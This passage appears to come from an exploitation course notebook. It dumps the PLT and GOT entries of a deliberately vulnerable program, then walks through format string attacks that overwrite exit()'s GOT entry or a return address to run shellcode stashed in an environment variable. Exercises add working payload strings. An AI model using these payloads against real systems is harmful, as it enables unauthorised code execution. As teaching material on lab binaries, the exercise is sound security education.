 804835c:	00 00                	add    %al,(%eax)
	...

08048360 <printf@plt>:
 8048360:	ff 25 0c a0 04 08    	jmp    *0x804a00c
 8048366:	68 00 00 00 00       	push   $0x0
 804836b:	e9 e0 ff ff ff       	jmp    8048350 <_init+0x24>

08048370 <strcpy@plt>:
 8048370:	ff 25 10 a0 04 08    	jmp    *0x804a010
 8048376:	68 08 00 00 00       	push   $0x8
 804837b:	e9 d0 ff ff ff       	jmp    8048350 <_init+0x24>

08048380 <puts@plt>:
 8048380:	ff 25 14 a0 04 08    	jmp    *0x804a014
 8048386:	68 10 00 00 00       	push   $0x10
 804838b:	e9 c0 ff ff ff       	jmp    8048350 <_init+0x24>

08048390 <exit@plt>:
 8048390:	ff 25 18 a0 04 08    	jmp    *0x804a018
 8048396:	68 18 00 00 00       	push   $0x18
 804839b:	e9 b0 ff ff ff       	jmp    8048350 <_init+0x24>


In [30]:
# display all dynamic relocations
! objdump -R ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049ffc R_386_GLOB_DAT    __gmon_start__
0804a00c R_386_JUMP_SLOT   printf@GLIBC_2.0
0804a010 R_386_JUMP_SLOT   strcpy@GLIBC_2.0
0804a014 R_386_JUMP_SLOT   puts@GLIBC_2.0
0804a018 R_386_JUMP_SLOT   exit@GLIBC_2.0
0804a01c R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0
0804a020 R_386_JUMP_SLOT   putchar@GLIBC_2.0




- NOTE: exit()'s GOT address

## Smuggle Shellcode & Exploit
- create shellcode using gdb-peda - see [GDB-Peda.ipynb](./GDB-Peda.ipynb) Notebook for details
- use perl -e 'print to write shellcode as a binary file' > shellcode.bin
- export shllcode as an env variable
- find and write the address of shellcode into the address of the exit() function
- you'll get a shell, when the program exits!

```
$ export SHELLCODE=$(cat shellcode.bin)
$ ./getenvaddr.exe SHELLCODE ./fmt_vuln.exe
$ echo $((0xbfff - 8)) # higher two bytes
$ echo $((0xf020 - 0xbfff)) # lower two bytes
# write to higher byte address for exit() first and then to lower byte address
$ ./fmt_vuln.exe $(printf "\x1a\xa0\x04\x08\x18\xa0\x04\x08")%49143x%4\$hn%12321x%5\$hn
```

### Advantage of using GOT
- GOT entries are fixed per binary
    - different system with the same binary will have the same GOT entry at the same address
    
- ability to overwrite any arbitrary address opens up many possiblilites for exploitation
- any section of writable memory that contains an address that directs the flow of program execution can be targeted

In [97]:
! cp ./booksrc/shellcodex86linuxexec .

In [98]:
# create SHELLCODE env variable
! export SHELLCODE=$(cat shellcodex86linuxexec)

In [100]:
# get the address of SHELLCODE variable
# run it in terminal if you do not see complete address!
! ./getenvaddr.exe SHELLCODE ./fmt_vuln.exe

SHELLCODE will be at 0x4


## Exercise 1
- stash your shellcode in shell environment and and exploit the `format string` vulnerability in fmt_vuln2.c to execute the shellcode by modifying the return address to the shellcode in environment.
### steps:
- stash your shellcode in shell environment
- find the address of shellcode using getenvaddr program
- find the nth parameter that'll crash fmt_vuln2 program
```
$ perl -e 'print "AAAA%x%x%x%x%x%x%x"' | ./fmt_vuln2.exe 
$ perl -e 'print "AAAA%x%x%x%x%x%x%7\$x"' | ./fmt_vuln2.exe
$ perl -e 'print "return address%7\$n"' | ./fmt_vuln2.exe
$ perl -e 'print "two return addresses%widthx%7\$hn%widthx%8\$hn' | ./fmt_vuln2.exe
```
- doing some math, update the return address using half-write with shellcode address

## Exercise 2
- Smuggle your `shellcode` as a part of data into the program and exploit the `format string` vulnerability in fmt_vuln2.c program found in this repo by modifying the return address to point to the exploit code.
### steps

```
- compile and make fmt_vuln2.c program a privileged program
- run the program to note the return address and the address of input buffer
- create an exploit file with 12 (not sled) + 24 (shellcode) bytes it makes it easier if the total bytes is multiple of 4
$ perl -e 'print "\x90"x12' > fmt_vuln2exploit.txt
$ cat shellcode.bin >> fmt_vuln2exploit.txt
$ wc - c fmt_vuln2exploit.txt
- find out the parameter count where AAAA repeats
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(perl -e 'print "AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"')
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(perl -e 'print "AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%15\$x"')
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(perl -e 'print "AAAA%15\$x"')
- now find the width parameter to write the address of input buffer at the return address
$ echo $((0xf057-36-8)) # exploit-return add =>61483
$ echo $((0x1bfff-0xf057)) # -> 53160
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(perl -e 'print "\xcc\xec\xff\xbf\xce\xec\xff\xbf%61483x%15\$n%53160x%16\$hn"')
```